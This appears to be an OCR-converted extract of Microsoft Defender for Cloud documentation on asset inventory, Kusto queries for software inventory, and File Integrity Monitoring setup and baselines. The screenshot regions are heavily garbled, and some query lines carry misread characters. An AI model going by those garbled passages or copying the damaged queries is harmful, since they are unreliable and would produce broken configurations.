zd App Service 0 instances Instance/Month © K on ] off ; ) 
E, Azure SQL Databases 0 servers Server/Month © ( On r of J 
E SQL servers on machines 0 servers — © | GO rT of } 
al Open-source relational databases 0 servers Server/Month © ( On aD 
am Storage 3 storage accounts 10k transactions © ZETO of ` 
ZO Kubernetes 18 kubernetes cores VM core/Month o ZETA o; 

SO Container registries O container registries Image © On am) 
®© Key Vault 1 key vaults 10k transactions K on ] of 


Resource Manager 


1M resource mana... © 


@ ns 


1M DNS queries © 


5. To further examine the results of your query, select the resources that interest you. 


6. To view the current selected filter options as a query in Resource Graph Explorer, 
select Open query. 


Azure Resource Graph Explorer d & xX 


+ New query E Open a query [> Run query save [&] Save as Q Feedback All subscriptions Vv | 


Query 1 


1  securityresources 

2 | where type =~ "microsoft.security/assessments" 

3 | extend assessmentStatusCode = tostring(properties.status.code) 

4 | extend severity = case(assessmentStatusCode =~ "unhealthy", tolower(tostring(properties.metadata.severity)), tolower 
(assessmentStatusCode) ) 


5 | extend source = tostring(properties.resourceDetails.Source) 

6 | extend resourcelId = trim(" ", tolower(tostring(case(source =~ "azure", properties.resourceDetails.Id, 

7 source =~ "aws", properties.additionalData.AzureResourceld, 

8 source =~ "gcp", properties.additionalData.AzureResourceld, 

9 extract ("*(.+)/providers/Microsoft.Security/assessments/.+$",1, 


EO 


Get started Results Messages 


7. If you've defined some filters and left the page open, Defender for Cloud won't 
update the results automatically. Any changes to resources won't impact the 
displayed results unless you manually reload the page or select Refresh. 


Access a software inventory 


To access the software inventory, you'll need one of the following paid solutions: 


e Agentless machine scanning from Defender Cloud Security Posture Management 
(CSPM). 

e Agentless machine scanning from Defender for Servers P2. 

e Microsoft Defender for Endpoint integration from Defender for Servers. 


If you've already enabled the integration with Microsoft Defender for Endpoint and 
enabled Microsoft Defender for Servers, you'll have access to the software inventory. 


Dashboard > Microsoft Defender for Cloud 


fy Microsoft Defender for Cloud | Inventory ~ x 
Showing 64 subscriptions 

P Search (Ctrl+/) | « oO Refresh -} Add non-Azure servers E Open query A sign tags 4 Download CSV report (A) T 

iin [ Filter by name | Subscriptions == All Resource Groups == All X Defender for Cloud == All X Environment == All X 

D overview 


Installed applications == All X< ty Add filter 
@ Getting started 


» A Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
= Recommendations 


GE 65748 & 3007 A % 0 % 0 


‘Inventory € a 

Resource name Ty Resource type Ty Subscription Ty Monitoring age... Ty Defend... Ty Recom.. Ty 
@ workbooks 

U B vm: Virtual machines ASC DEMO OO Not installed On — 

GO Community 

E srv-work Virtual machines ASC DEMO © Installed On = 
@ Diagnose and solve problems 

E srv-jump Virtual machines ASC DEMO @ Installed On — 
Cloud Security TI D contosowebde Virtual machines ASC DEMO @ Installed On — E 
© Secure Score B contosowebbe2 Virtual machines ASC DEMO @ Installed On — 
E Regulatory compliance EA cqitoremidiate Virtual machines ASC DEMO OO Not installed On — 
Ọ Workload protections E asc-va-demo-01 Virtual machines ASC DEMO @ Installed On — 
E Firewall Manager EA contosowebfe1 Virtual machines ASC DEMO @ Installed On — E 


Management 


© Note 
The "Blank" option shows machines without Microsoft Defender for Endpoint or 
without Microsoft Defender for Servers. 

Besides the filters in the asset inventory page, you can explore the software inventory 


data from Azure Resource Graph Explorer. 


Examples of using Azure Resource Graph Explorer to access and explore software 
inventory data: 


1. Open Azure Resource Graph Explorer. 


Microsoft Azure IE Sr e 


Dashboard > Services See all 
0 Microsoft Defender for C ri resource Graph Explorer b 
Showing 73 subscriptions = : 
z Resource Graph queries 
a= ae e br t.a 


2. Select the following subscription scope: securityresources/softwareinventories 


3. Enter any of the following queries (or customize them or write your own!) and 
select Run query. 


e To generate a basic list of installed software: 
Kusto 


securityresources 


| where type == "microsoft.security/softwareinventories" 
| project id, Vendor=properties.vendor, 


Software=properties.softwareName, Version=properties.version 


e To filter by version numbers: 
Kusto 


securityresources 


| where type == "microsoft.security/softwareinventories" 
| project id, Vendor=properties.vendor, 


Software=properties.softwareName, Version=tostring(properties. 
version) 


| where Software=="windows_server_2019" and parse_version(Version) 
<=parse_version("10.0.17763.1999" ) 


e To find machines with a combination of software products: 
Kusto 


securityresources 
| where type == "microsoft.security/softwareinventories" 
| extend vmId = properties.azureVmId 


| where properties.softwareName == "apache _http_server" or 
properties.softwareName == "mysql" 


| summarize count() by tostring(vmId) 
| where count_ > 1 


e Combination of a software product with another security recommendation: 


(In this example — machines having MySQL installed and exposed 
management ports) 


Kusto 


securityresources 


| where type == "microsoft.security/softwareinventories" 
| extend vmId = tolower(properties.azureVmId) 

| where properties.softwareName == "mysql" 

| join ( 


securityresources 


| where type == "microsoft.security/assessments" 

| where properties.displayName == "Management ports should be 
closed on your virtual machines" and properties.status.code == 
"Unhealthy" 


| extend vmId = tolower(properties.resourceDetails.Id) 
) on vmId 


Next steps 


This article described the asset inventory page of Microsoft Defender for Cloud. 
For more information on related tools, see the following pages: 


e Azure Resource Graph (ARG) 
e Kusto Query Language (KQL) 


e View common question about asset inventory 


Enable File Integrity Monitoring when 
using the Azure Monitor Agent 


Article e 08/30/2023 


To provide File Integrity Monitoring (FIM), the Azure Monitor Agent (AMA) collects data 
from machines according to data collection rules. When the current state of your system 
files is compared with the state during the previous scan, FIM notifies you about 
suspicious modifications. 


O Note 


As part of our Defender for Cloud updated strategy, the Azure Monitor Agent will 
no longer be required to receive all the capabilities of Defender for Servers. All 
features that currently rely on the Azure Monitor Agent, including those described 
on this page, will be available through Microsoft Defender for Endpoint 
integration or agentless scanning, by August 2024. To access the full capabilities of 
Defender for SQL server on machines, the Azure monitoring Agent (also known as 
AMA) is required. For more information about the feature road map, see this 


announcement. 


File Integrity Monitoring with the Azure Monitor Agent offers: 


e Compatibility with the unified monitoring agent - Compatible with the Azure 
Monitor Agent that enhances security, reliability, and facilitates multi-homing 
experience to store data. 

e Compatibility with tracking tool- Compatible with the Change tracking (CT) 
extension deployed through the Azure Policy on the client's virtual machine. You 
can switch to Azure Monitor Agent (AMA), and then the CT extension pushes the 
software, files, and registry to AMA. 

e Simplified onboarding- You can onboard FIM from Microsoft Defender for Cloud. 

e Multi-homing experience — Provides standardization of management from one 
central workspace. You can transition from Log Analytics (LA) to AMA so that all 
VMs point to a single workspace for data collection and maintenance. 

e Rules management e Uses Data Collection Rules? to configure or customize 
various aspects of data collection. For example, you can change the frequency of 
file collection. 


In this article you'll learn how to: 


e Enable File Integrity Monitoring with AMA 


e Edit the list of tracked files and registry keys 


e Exclude machines from File Integrity Monitoring 


Availability 


Aspect 
Release state: 
Pricing: 


Required roles 


Details 
Preview 
Requires Microsoft Defender for Servers Plan 2 


Owner 


and Contributor 

permissions: 

Clouds: Lv] Commercial clouds - Supported only in regions: australiaeast, 
australiasoutheast, canadacentral, centralindia, centralus, eastasia, 
eastus2euap, eastus, eastus2, francecentral, japaneast, koreacentral, 
northcentralus, northeurope, southcentralus, southeastasia, 
switzerlandnorth, uksouth, westcentralus, westeurope, westus, westus2 
* National (Azure Government, Microsoft Azure operated by 21Vianet) 
Lv] Azure Arc enabled devices. 

Lv] Connected AWS accounts 
OO Connected GCP accounts 
Prerequisites 


To track changes to your files on machines with AMA: 


e Enable Defender for Servers Plan 2 


e Install AMA on machines that you want to monitor 


Enable File Integrity Monitoring with AMA 


To enable File Integrity Monitoring (FIM), use the FIM recommendation to select 
machines to monitor: 


1. From Defender for Cloud's sidebar, open the Recommendations page. 


2. Select the recommendation File integrity monitoring should be enabled on 


machines Z 


. Learn more about Defender for Cloud recommendations. 


3. Select the machines that you want to use File Integrity Monitoring on, select Fix, 


and select Fix X resources. 
The recommendation fix: 


e Installs the ChangeTracking-Windows or ChangeTracking-Linux extension on 
the machines. 

e Generates a data collection rule (DCR) for the subscription, named Microsoft- 
ChangeTracking-[ subscriptionId]-default-dcr, that defines what files and 
registries should be monitored based on default settings. The fix attaches the 
DCR to all machines in the subscription that have AMA installed and FIM 
enabled. 

e Creates a new Log Analytics workspace with the naming convention 
defaultWorkspace-[subscriptionId]-fim and with the default workspace 


settings. 
You can update the DCR and Log Analytics workspace settings later. 


4. From Defender for Cloud's sidebar, go to Workload protections > File integrity 
monitoring, and select the banner to show the results for machines with Azure 
Monitor Agent. 


Home Microsoft Defender for Cloud | Workload protections 


File Integrity Monitoring 


AA This page displays results for machines with Log Analytics agent. To view the results for machines with Azure Monitoring Agen 


O 


5. The machines with File Integrity Monitoring enabled are shown. 


dome > Microsoft Defender for Cloud | Workload protections > File Integrity Monitoring 


File integrity monitoring 


You can see the number of changes that were made to the tracked files, and you 
can select View changes to see the changes made to the tracked files on that 


machine. 


Edit the list of tracked files and registry keys 


File Integrity Monitoring (FIM) for machines with Azure Monitor Agent uses Data 
Collection Rules (DCRs) to define the list of files and registry keys to track. Each 


subscription has a DCR for the machines in that subscription. 


FIM creates DCRs with a default configuration of tracked files and registry keys. You can 
edit the DCRs to add, remove, or update the list of files and registries that are tracked by 


FIM. 


To edit the list of tracked files and registries: 


1. 


N 


In File integrity monitoring, select Data collection rules. 


You can see each of the rules that were created for the subscriptions that you have 


access to. 
Select the DCR that you want to update for a subscription. 


Each file in the list of Windows registry keys, Windows files, and Linux files contains 
a definition for a file or registry key, including name, path, and other options. You 
can also set Enabled to False to untrack the file or registry key without removing 
the definition. 


Learn more about system file and registry key definitions. 


3. Select a file, and then add or edit the file or registry key definition. 


4. Select Add to save the changes. 


Exclude machines from File Integrity 
Monitoring 


Every machine in the subscription that is attached to the DCR is monitored. You can 
detach a machine from the DCR so that the files and registry keys aren't tracked. 


To exclude a machine from File Integrity Monitoring: 


1, 


In the list of monitored machines in the FIM results, select the menu (...) for the 


machine 


2. Select Detach data collection rule. 


g 
EEE 
$ 


The machine moves to the list of unmonitored machines, and file changes aren't tracked 
for that machine anymore. 


Next steps 
Learn more about Defender for Cloud in: 


e Setting security policies - Learn how to configure security policies for your Azure 
subscriptions and resource groups. 

e Managing security recommendations - Learn how recommendations help you 
protect your Azure resources. 

e Azure Security blog’ - Get the latest Azure security news and information. 


File Integrity Monitoring using the Log 
Analytics agent 


Article e 05/10/2023 


To provide File Integrity Monitoring (FIM), the Log Analytics agent uploads data to the 
Log Analytics workspace. By comparing the current state of these items with the state 
during the previous scan, FIM notifies you if suspicious modifications have been made. 


O Note 


As the Log Analytics agent (also known as MMA) is set to retire in August 2024”, 
all Defender for Servers features that currently depend on it, including those 
described on this page, will be available through either Microsoft Defender for 
Endpoint integration or agentless scanning, before the retirement date. For more 
information about the roadmap for each of the features that are currently rely on 
Log Analytics Agent, see this announcement. 


In this article, you'll learn how to: 


e Enable File Integrity Monitoring with the Log Analytics agent 
e Disable File Integrity Monitoring 

e Monitor workspaces, entities, and files 

e Compare baselines using File Integrity Monitoring 


© Note 


File Integrity Monitoring may create the following account on monitored SQL 
Servers: NT Service\HealthService 


If you delete the account, it will be automatically recreated. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Requires Microsoft Defender for Servers Plan 2. 


Using the Log Analytics agent, FIM uploads data to the Log Analytics 


Aspect Details 


workspace. Data charges apply, based on the amount of data you upload. 
See Log Analytics pricing Z to learn more. 


Required roles and Workspace owner can enable/disable FIM (for more information, see Azure 
permissions: Roles for Log Analytics). 
Reader can view results. 


Clouds: Lv] Commercial clouds 
OO National (Azure Government, Microsoft Azure operated by 21Vianet) 
Supported only in regions where Azure Automation's change tracking 
solution is available. 
Lv] Azure Arc enabled devices. 
See Supported regions for linked Log Analytics workspace. 
Learn more about change tracking. 
OO Connected AWS accounts 


Enable File Integrity Monitoring with the Log 
Analytics agent 


FIM is only available from Defender for Cloud's pages in the Azure portal. There's 
currently no REST API for working with FIM. 


1. From the Workload protections dashboard's Advanced protection area, select File 
integrity monitoring. 


O Microsoft Defender for Cloud | Workload protections 


g 73 subscriptions 
[2 Search (Ctrl+ Y Subscriptions C? What's new 
General Defender for Cloud coverage 
© overview 
G a started EE, 
(Getting |sextes E 385/204 eee 34/34 @ 14m GO 85/85 ® 116 7m6 
= Recommendations Servers Kubernetes Container registries App Service Key Vault 
© Security alerts ipai 
@ Inventory 
@ Workbooks = ere 
E, 39:39 = 417/4% Ea 23/24 23/24 
& Community I Fully covered (93%) 
z Azure SQL databas.. Storage Resource Manager ... DNS subscriptions 

Agent not installed (3.7%) Install 
@ Diagnose and solve problems 

Not covered (3.3%) Upgrade all Upgrade Upgrade Upgrade Upgrade 


Cloud Security 
© secure Score Security alerts 
D Regulatory compliance 


Q workload protections 


E Firewall Manager 


= TTT 
ricing & settings 


Advanced protection 


d eee EZ VM vulnerability assessment © Just-in-time VM access E, Adaptive application control d Container image scanning GA Adaptive network hardening 
149 unprotected 15 unprotected 50 unprotected 8 unprotected 14 Unprotected 
@ Cloud connectors A 
E, SQL vulnerability assessment B File integrity monitoring pen Network map E loT security 
-= Ten 


10 Unprotected d 


The following information is provided for each workspace: 


e Total number of changes that occurred in the last week (you may see a dash 


wow 


if FIM isn't enabled on the workspace) 


e Total number of computers and VMs reporting to the workspace 


e Geographic location of the workspace 
e Azure subscription that the workspace is under 


2. Use this page to: 


e Access and view the status and settings of each workspace 


e Upgrade the workspace to use enhanced security features. This 
icon indicates that the workspace or subscription isn't protected with 


Microsoft Defender for Servers. To use the FIM features, your subscription 


must be protected with this plan. Learn about how to enable Defender for 


Servers. 


° Enable FIM on all machines under the workspace and configure 
the FIM options. This icon indicates that FIM isn't enabled for the workspace. 


If there's no enable or upgrade button, and the space is blank, it means that 


FIM is already enabled on the workspace. 
File Integrity Monitoring & 
d Refresh 


À File Integrity Monitoring 


Choose a workspace to view its File Integrity Monitoring dashboard 


Workspace Name Ty Totalchanges 7 Total servers TL Location N 
GO la-sh360-00edf 0 0 East US 
E la-sh360-9472d 0 0 East US 
GO cha 1.1K 318 East US 
GO  ch-la-dev 546 270 East US 
OU defaultworkspace-Oba- 0 0 East US 
GO la-sh360-0ba67 0 0 East US 


Subscription N 
Contoso Dev_EUS 
Contoso Dev_India 
Contoso Hotels 

Contoso Hotels - Dev 
Contoso Infra1 


Contoso Infra1 


UPGRADE PLAN 


ENABLE do 
UPGRADE PLAN 


3. Select ENABLE. The details of the workspace including the number of Windows 


and Linux machines under the workspace is shown. 


Enable File Integrity Monitoring & x 


defaultworkspace-04 


> What is File Integrity Monitoring? 


© Enabling file integrity monitoring affects all machines connected to the selected workspace (defaultworkspace-04) 


Windows Servers Linux Servers LEARN MORE 


0 4 Learn more about File Integrity Monitoring & 


Recommended settings 
E > windows Files 
E > Registry 
E > Linux Files 


File Integrity Monitoring (FIM) uploads data to the Log Analytics workspace. Data charges will apply, based on the E 
amount of data you upload. To learn more about Log Analytics pricing click here. 


Selected settings from above are applied. You can modify the settings later using ‘File Integrity Monitoring’ settings 


File Integrity Monitoring leverages the Change Tracking solution enabled on your workspace. 


Enable File Integrity Monitoring m 


The recommended settings for Windows and Linux are also listed. Expand 
Windows files, Registry, and Linux files to see the full list of recommended items. 


4. Clear the checkboxes for any recommended entities you don't want to be 
monitored by FIM. 


5. Select Apply file integrity monitoring to enable FIM. 


You can change the settings at any time. Learn more about editing monitored entities. 


Disable File Integrity Monitoring 


FIM uses the Azure Change Tracking solution to track and identify changes in your 
environment. By disabling FIM, you remove the Change Tracking solution from selected 
workspace. 


To disable FIM: 


1. From the File Integrity Monitoring dashboard for a workspace, select Disable. 


File Integrity Monitoring & x 
ad 


GO Settings O Refresh Y Fiter] E Disable | 


Total servers Total changes Change type Change catego EE PORE 
2 dii : EZ Learn more about File Integrity Monitoring & 
8 34 Files 0 Modified 0 
Registry 34 Mmmm Added 17 


Removed 17 B 


Servers Changes 


>? Search servers 


Name TA, Totalchanges ‘Ty Files Ty Registry TA, Last change Dr TA 
E vmtest 10 0 10 09/28/20, 5:40 PM 
E server16-test 8 0 8 09/28/20, 8:49 AM 
E vmsses000001 6 0 6 09/27/20, 8:35 PM 
EZ vmsses000000 6 0 6 09/29/20, 5:00 AM 
EZ vmsses000003 4 0 4 09/27/20, 9:28 PM 
E testing321 0 0 0 

EZ vmi 0 0 0 

EH vmsseso00002 0 0 0 


2. Select Remove. 


Monitor workspaces, entities, and files 


Audit monitored workspaces 


The File integrity monitoring dashboard displays for workspaces where FIM is enabled. 
The FIM dashboard opens after you enable FIM on a workspace or when you select a 
workspace in the file integrity monitoring window that already has FIM enabled. 


File Integrity Monitoring & x 


ad 


GO Settings © Refresh Y Filter E Disable 


Total servers Total changes Change type Change category LEARN MORE d E ZE 
Learn more about File Integrity Monitoring E 
8 34 Files 0 Modified 0 
Registry 34 B Added 17 B 


Removed 17 B 


Servers Changes 


| O Search servers 


Name ty Totalchanges îy Files TA, Registry Ty Last change tim.. 
E vmtest 10 0 10 09/28/20, 5:40 PM 
E serveri16-test 8 0 8 09/28/20, 8:49 AM 
EA 6 0 6 09/27/20, 8:35 PM 
E 6 0 6 09/29/20, 5:00 AM 
E vmsses000003 4 0 4 09/27/20, 9:28 PM 
E testing321 0 0 0 

EA vmi 0 0 0 

E vmssesoo0002 0 0 0 


The FIM dashboard for a workspace displays the following details: 


e Total number of machines connected to the workspace 

e Total number of changes that occurred during the selected time period 
e A breakdown of change type (files, registry) 

e A breakdown of change category (modified, added, removed) 


Select Filter at the top of the dashboard to change the time period for which changes 


are shown. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring Filter 


File Integrity Monitoring & 
ad 


GO Settings ed) Refresh] D Filter of Disable Time 
d (_) Last 30 Minutes 


() Last 1 Hour 


Total servers Total changes Change type Change category 
(_) Last 6 Hours 
a E bea b EZEREN, 6S O Last 24 Hours 
Registry 34 En | Added an (@) Last 7 Days 


© Last 30 Days 


Removed 17 B 


Servers Changes 


| b Search servers 


» 


Name TA, Total changes 4 Files TA 


EA vmtest 10 0 


The Servers tab lists the machines reporting to this workspace. For each machine, the 
dashboard lists: 


e Total changes that occurred during the selected period of time 
e A breakdown of total changes as file changes or registry changes 


When you select a machine, the query appears along with the results that identify the 
changes made during the selected time period for the machine. You can expand a 
change for more information. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Monitoring 


d Logs 2 » x 
gd 
E New Query 1* x | 4+ © Feedback EZ Queries EZ Query explorer & M v 
® gd Select scope Spa | ( Time range: Custom ) Sae w E Share w ek Newalertrule = Export w e Pinto dashboard | = Format query 
a ae 1 ConfigurationChange 
Tables Queries Functions « 2 | where Computer == petzen 
3 | where ConfigChangeType in("Files", “Registry") 
D Search 4 | order by TimeGenerated 
5 | render table 
Y Filter ) IÆ Group by: Solution ~ 
TT Collapse all 
Favorites B R 
You can add favorites by clicking on Results Chart DU Columns v | © Display time (uTC+00:00) ~ = @__) Group columns 


the * icon 


Completed. Showing results from the custom time range. © 00:07.5 E 14records b 


SG 


Microsoft Sentinel 


> Change Tracking {UTC}... t Computer Y  ConfigChan: VY ChangeCategory Y SourceComputerid Y Registry Hive ValueName 
» LogManagement > 4/18/2021, 2:25:25.817 PM vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTR 
» Security and Audit : > 4/18/2021, 3:14:49.153 PM vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL_... HKEY_LOCAL.... \REGISTR' 
£ SecurityCentorrres > 4/19/2021, 9:26:44,900 PM vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTR 
> 4/9/2021, 9:26:44.900 EN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL.... HKEY_LOCAL... \REGISTR' 
> 4/19/2021, 10:15:57.737 BN vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL.... HKEY_LOCAL.... \REGISTR' 
> 4/9/2021, 10:15:57.737 BN vmtest Registry Removed 904ba38f-ca19-455..._ HKEY_LOCAL.... HKEY_LOCAL... \REGISTR' 
> 4/22/2021, 1:56:49.877 AN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTR' 
> 4/22/2021, 2:45:58.467 AN vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL.... HKEY_LOCAL... \REGISTR' 
> 4/24/2021, 6:26:44.633 AN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTRYV’ 
> 4/24/2021, 7:15:57.467 AN vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL..._ HKEY_LOCAL.... 
> 4/24/2021, 8:56:18.993 AN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... 
HEE 
l4 4 Page 1 of1 > Pl 50 items per page 1-14 of 14 tems 


The Changes tab (shown below) lists all changes for the workspace during the selected 
time period. For each entity that was changed, the dashboard lists the: 


e Machine that the change occurred on 
e Type of change (registry or file) 
e Category of change (modified, added, removed) 


Date and time of change 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring 


File Integrity Monitoring ~ x 


gd 


Ber) Settings oO Refresh Y Filter E Disable 


Total servers Total changes Change type Change catego: LEARN MORE 
e ZZ e Za Learn more about File Integrity Monitoring & 
8 50 Files 20 Modified 2 m 
Registry 48 B Added 24 B 
Removed 24 BO 
Servers 


Changes 


TA Server Ty Type ty Category Ty Change time Tau TA 

E HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRYYMACHINE\COMPO.= vmtest Registry Removed 04/25/21, 06:15 AM 

r HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\COMPO:-. vmtest Registry Added 04/25/21, 05:26 AM 

L HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS server16-test Registry Removed 04/24/21, 04:43 PM 

EO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS — server16-test Registry Added 04/24/21, 03:53 PM 

EO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Removed 04/24/21, 12:45 PM 
Me HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Added 04/24/21 
er HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Removed 04/24/21) 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Added 04/24/21, 09:26 AM 


Change details opens when you enter a change in the search field or select an entity 


listed under the Changes tab. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring 


File Integrity Monitoring 
gd 


& Settings © Refresh Y Filter E Disable 
Total servers Total changes Change type 
8 50 Files 20 
Registry 49 Pr 
Servers 


Changes 


wu Presenting the latest 100 changes. Click here to view all changes in Log Analytic 


l D Search changes 


Entity 


SA 
EO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGIS 


E HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control KE REGIS 


HEE HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr 


‘ontrol\hivelist | \REGIS 


a 
ZO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGIS 


Edit monitored entities 


Property 
SourceComputerld 
RegistryKey 
Hive 
ValueName 
ValueData 
ValueType 
Size 
Acls 
SourceSystem 
MG 
ManagementGroupName 
Tenantid 
VMUUID 


‘Unchanged properties 


Value Before 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist x 


Change details 


Value After 

904 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist 
HKEY_LOCAL_MACHINE 

\REGISTRY\MACHINE\COMPONENTS, 
\Device\HarddiskVolume1\Windows\System32\config\COMPONENTS 
REG_SZ 

59 

[{ "Name": "owner" "Value": "BUILTIN\\Administrators" } { "Name": "Group" "Value": "NT... 
Ops 

00000000-0000-0000-0000-000000000001 

AOI 

552 


99b 


TE 


1. From the File Integrity Monitoring dashboard for a workspace, select Settings 


from the toolbar. 


Dashboard > Microsoft Defender for Cloud 


File Integrity Monitoring 


defaultworkspace-d 


GO Settings oO Refresh Y Filter E Disable 


d 


File Integrity Monitoring 


Total servers Total changes Change type Change category eluate ; ; d 
Learn more about File Integrity Monitoring & 
5 0 Files 0 Modified 0 
Registry 0 Added 0 
Removed 0 
Servers Changes 
| P Search servers 
Name Ty, Totalchanges Ty Files Ty Registry îy Last change time [Local] Ty 
EA esti 0 0 0 
be aks-agentpool-4 0 0 0 
EA aks-a 0 0 0 
ba aks-agent 0 0 0 
E Traffic 0 0 0 A 


Workspace Configuration opens with tabs for each type of element that can be 


monitored: 


e Windows registry 


Windows files 


Linux Files 


File content 


Windows services 


Each tab lists the entities that you can edit in that category. For each entity listed, 
Defender for Cloud identifies whether FIM is enabled (true) or not enabled (false). 
Edit the entity to enable or disable FIM. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Monitoring 


Workspace Configuration 
Change Tracking 


+ Add © Documentation 


Group Enabled Registry Key Recursive 
Recommended false HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\inter... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Wind... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Wind... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Wind... true 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentV... false 


2. Select an entry from one of the tabs and edit any of the available fields in the Edit 
for Change Tracking pane. Options include: 


Enable (True) or disable (False) file integrity monitoring 


Provide or change the entity name 


Provide or change the value or path 


Delete the entity 


3. Discard or save your changes. 


Add a new entity to monitor 


1. From the File Integrity Monitoring dashboard for a workspace, select Settings 
from the toolbar. 


The Workspace Configuration opens. 
2. On the Workspace Configuration: 


a. Select the tab for the type of entity that you want to add: Windows registry, 
Windows files, Linux Files, file content, or Windows services. 


b. Select Add. 


In this example, we selected Linux Files. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Monitoring 


Workspace Configuration 


Windows Registry Windows Files File Content Windows Services 


Group Enabled Path Type Links Recursive Sudo Upload file TZ. 


Recommended true /etc/*.conf File Follow true true 100 


3. Select Add. Add for Change Tracking opens. 


4. Enter the necessary information and select Save. 


Folder and path monitoring using wildcards 


Use wildcards to simplify tracking across directories. The following rules apply when you 
configure folder monitoring using wildcards: 


e Wildcards are required for tracking multiple files. 

e Wildcards can only be used in the last segment of a path, such as C:\folder\file 
or /etc/*.conf 

e |f an environment variable includes a path that isn't valid, validation succeeds but 
the path fails when inventory runs. 

e When setting the path, avoid general paths such as c:\*.*, which results in too 


many folders being traversed. 


Compare baselines using File Integrity 
Monitoring 


File Integrity Monitoring (FIM) informs you when changes occur to sensitive areas in 
your resources, so you can investigate and address unauthorized activity. FIM monitors 


Windows files, Windows registries, and Linux files. 


Enable built-in recursive registry checks 


The FIM registry hive defaults provide a convenient way to monitor recursive changes 
within common security areas. For example, an adversary may configure a script to 
execute in LOCAL_SYSTEM context by configuring an execution at startup or shutdown. 
To monitor changes of this type, enable the built-in check. 


Recommended false HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown 
Recommended false HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions 

© Note 


Recursive checks apply only to recommended security hives and not to custom 
registry paths. 


Add a custom registry check 


FIM baselines start by identifying characteristics of a known-good state for the 
operating system and supporting application. For this example, we'll focus on the 
password policy configurations for Windows Server 2008 and higher. 


Policy Name Registry Setting 


Domain controller: Refuse MACHINE\System\CurrentControlSet\Services 


machine account password 
changes 


Domain member: Digitally 
encrypt or sign secure channel 
data (always) 


Domain member: Digitally 
encrypt secure channel data 
(when possible) 


Domain member: Digitally sign 
secure channel data (when 
possible) 


Domain member: Disable 
machine account password 


\Netlogon\Parameters\RefusePasswordChange 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\RequireSignOrSeal 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\SealSecureChannel 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\SignSecureChannel 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\DisablePasswordChange 


PariegeName Registry Setting 


Domain member: Maximum MACHINE\System\CurrentControlSet\Services 
machine account password age \Netlogon\Parameters\MaximumPasswordAge 


Domain member: Require strong ©MACHINE\System\CurrentControlSet\Services 
(Windows 2000 or later) session \Netlogon\Parameters\RequireStrongKey 
key 


Network security: Restrict NTLM: »§ MACHINE\System\CurrentControlSet\Services 
NTLM authentication in this \Netlogon\Parameters\RestrictNTLMInDomain 
domain 


Network security: Restrict NTLM: |» MACHINE\System\CurrentControlSet\Services 
